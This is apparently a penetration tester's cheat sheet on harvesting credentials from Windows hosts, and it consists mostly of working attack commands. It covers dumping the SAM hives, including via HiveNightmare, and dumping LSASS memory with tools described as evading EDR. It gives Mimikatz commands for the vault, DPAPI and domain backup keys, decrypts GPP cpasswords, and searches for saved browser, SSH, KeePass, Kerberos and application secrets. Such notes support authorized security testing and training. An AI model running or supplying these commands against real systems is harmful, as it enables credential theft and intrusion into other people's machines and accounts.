PrivEsc - Credentials & Files
Sections PrivEsc - Credentials & Files
Credentials lying on the box. The most reliable Windows privesc when the privileges and services come up clean.
i. SAM, SYSTEM, SECURITY hives
Locked while Windows is running. Need SeBackup, admin, or HiveNightmare (CVE-2021-36934).
With SeBackupPrivilege (covered in PrivEsc - Tokens & Privileges ):
reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
reg save HKLM\SECURITY C:\Windows\Temp\SECURITY
HiveNightmare (any non-admin, Win10 1809+ to early 2021 patch):
icacls C:\Windows\System32\config\SAM
## If "BUILTIN\Users:(I)(RX)" is shown, every user has read on SAM
## Read from Volume Shadow Copies:
mklink /D C:\Temp\vss \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
copy C:\Temp\vss\Windows\System32\config\SAM C:\Windows\Temp\
copy C:\Temp\vss\Windows\System32\config\SYSTEM C:\Windows\Temp\
copy C:\Temp\vss\Windows\System32\config\SECURITY C:\Windows\Temp\
Parse on attacker:
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
Output gives you local Administrator NTLM (use for PtH, see Lateral Movement ) and any cached domain creds.
ii. LSASS dump
All currently-logged-in users’ creds, in plaintext or NTLM. Needs SeDebug or admin.
procdump (Microsoft-signed, often not flagged):
procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
nanodump (designed for EDR evasion):
nanodump.exe --write C:\Windows\Temp\lsass.dmp
Comsvcs.dll trick (no external binary needed):
$id = (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $id C:\Windows\Temp\lsass.dmp full
Or Task Manager GUI: Details -> right-click lsass.exe -> Create dump file.
Parse on attacker:
impacket-pypykatz lsa minidump lsass.dmp
## or
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Modern Windows (Server 2019+, Win10 with PPL enabled) protects LSASS with PPL. Standard procdump fails. Use PPLdump or PPLBlade to bypass.
iii. Windows Credential Manager / Vault
Saved RDP creds, web creds, Windows logins:
cmdkey /list
Use them with runas without seeing the password:
runas /savecred /user:DOMAIN\Administrator "C:\Windows\Temp\sh.exe"
Dump cleartext via Mimikatz:
mimikatz.exe
vault::list
vault::cred /patch
Direct vault file access (per-user DPAPI-encrypted):
dir /a:h /s %userprofile%\AppData\Local\Microsoft\Vault\
dir /a:h /s %userprofile%\AppData\Local\Microsoft\Credentials\
iv. DPAPI master keys and credential files
DPAPI encrypts most user secrets. Get the master key, decrypt everything.
Master key locations:
dir /a:h C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\
dir /a:h C:\Users\<user>\AppData\Local\Microsoft\Credentials\
Decrypt with mimikatz (need user’s password OR domain DPAPI backup key from DC):
mimikatz.exe
dpapi::cred /in:C:\Users\u\AppData\Local\Microsoft\Credentials\HASHFILE
dpapi::masterkey /in:"C:\Users\u\AppData\Roaming\Microsoft\Protect\SID\MK" /password:"userpass"
Domain-wide DPAPI backup key, dump from DC (needs Domain Admin):
impacket-secretsdump -system SYSTEM -security SECURITY -ntds NTDS.dit LOCAL
## or
mimikatz: lsadump::backupkeys /system:DC01 /export
v. Saved app credentials
PuTTY saved sessions (clear-text proxy passwords, weakly-encrypted auth):
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
PuTTY private keys (.ppk):
dir /s /b C:\Users\*.ppk
WinSCP saved sessions:
reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
## Decrypt with winscppasswd.py from impacket-examples or:
## https://github.com/anoopengineer/winscppasswd
MobaXterm saved sessions:
dir /s /b "%userprofile%\Documents\MobaXterm*"
type "%userprofile%\Documents\MobaXterm\MobaXterm.ini" 2>nul
## Decrypt with MobaXtermPasswordDecrypt
FileZilla:
type "%appdata%\FileZilla\sitemanager.xml" 2>nul
type "%appdata%\FileZilla\recentservers.xml" 2>nul
OpenVPN:
dir /s /b C:\Users\*.ovpn
KeePass DB files:
dir /s /b C:\Users\*.kdbx C:\Users\*.kdb 2>nul
Crack with hashcat:
keepass2john db.kdbx > kp.hash
hashcat -m 13400 kp.hash "$WL"
vi. Browser saved credentials
Chrome / Edge (Chromium-based, same format):
type "%localappdata%\Google\Chrome\User Data\Default\Login Data" ## SQLite, DPAPI-encrypted passwords
type "%localappdata%\Microsoft\Edge\User Data\Default\Login Data"
Extract with SharpChrome (SharpDPAPI) or LaZagne. Browser creds need DPAPI master key (so user’s password or session).
LaZagne.exe browsers
LaZagne.exe all ## kitchen sink
Firefox stores creds in logins.json, decrypt with firefox_decrypt.py:
dir /a:h "%appdata%\Mozilla\Firefox\Profiles\*\logins.json"
dir /a:h "%appdata%\Mozilla\Firefox\Profiles\*\key4.db"
vii. Unattended install files
GPP, sysprep, MDT, SCCM dump passwords into XML files that admins forget to delete:
dir /s /b C:\Unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml 2>nul
dir /s /b C:\Windows\System32\sysprep\sysprep.xml C:\Windows\System32\sysprep\sysprep.inf 2>nul
dir /s /b C:\Windows\system32\sysprep\Panther\setupact.log 2>nul
findstr /si pass *.xml *.ini *.txt *.config 2>nul
GPP cpassword (when host pulls policy from SYSVOL):
findstr /S /I cpassword \\%USERDNSDOMAIN%\sysvol\%USERDNSDOMAIN%\Policies\*.xml
## Or local cached:
findstr /S /I cpassword C:\ProgramData\Microsoft\Group Policy\*.xml
Decrypt cpassword (AES key is public):
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
viii. PowerShell history (recap from Local Enum )
Every command typed in PowerShell with PSReadLine gets logged. Common cred source:
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -EA SilentlyContinue | %{ Write-Host $_.FullName; Get-Content $_.FullName }
ix. Application configs and web.config
ASP.NET applications often have DB connection strings in web.config:
dir /s /b C:\inetpub\wwwroot\*\web.config 2>nul
findstr /si "connectionString\|password\|pwd" C:\inetpub\wwwroot\*\web.config 2>nul
Decrypt protected sections of web.config (requires being the app pool identity):
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" C:\inetpub\wwwroot\app
App.config for .NET desktop apps:
dir /s /b C:\Program Files*\*.config 2>nul | findstr /v Microsoft
x. Kerberos cached tickets
If you can read another user’s Kerberos cache, you have their TGT. Triton/Rubeus dump:
klist
Rubeus.exe dump
Rubeus.exe triage
Save and use elsewhere, see AD MOC -> Pass-the-Ticket.
xi. SSH on Windows
OpenSSH client and server are built-in on modern Windows. SSH keys often present:
dir /a /s C:\Users\*\.ssh\id_*
type %userprofile%\.ssh\known_hosts
type %userprofile%\.ssh\config
xii. Outlook PST and OST
User’s email archive, often contains password reset emails, internal docs with creds:
dir /s /b "%localappdata%\Microsoft\Outlook\*.pst" "%localappdata%\Microsoft\Outlook\*.ost" 2>nul
Read offline with libpff, readpst, or open in Outlook on attacker.
xiii. Backup files everywhere
Backup files are the goldmine, admins always forget them:
dir /s /b C:\*.bak C:\*.backup C:\*.old C:\*.orig 2>nul
where /r C:\ *.bak *.old *.config.bak 2>nul
Pay attention to C:\Windows\repair\ (SAM/SYSTEM legacy backups) and C:\Users\*\Documents\.
xiv. Recycle Bin
Other users’ deleted files, often readable:
dir /a /s C:\$Recycle.Bin 2>nul
The filenames are mangled but readable per-SID subdirectories tell you who deleted them.
xv. Memory dumps and crash dumps
Service crashes can dump LSASS-like content:
dir /s C:\Windows\Minidump\
dir C:\Windows\MEMORY.DMP
Read with WinDbg or strings for cred fragments.
xvi. After cred, where to use it
- Local user privesc ->
runasor RDP - Lateral to another host -> Lateral Movement
- AD domain -> AD MOC
- Cloud creds -> Cloud MOC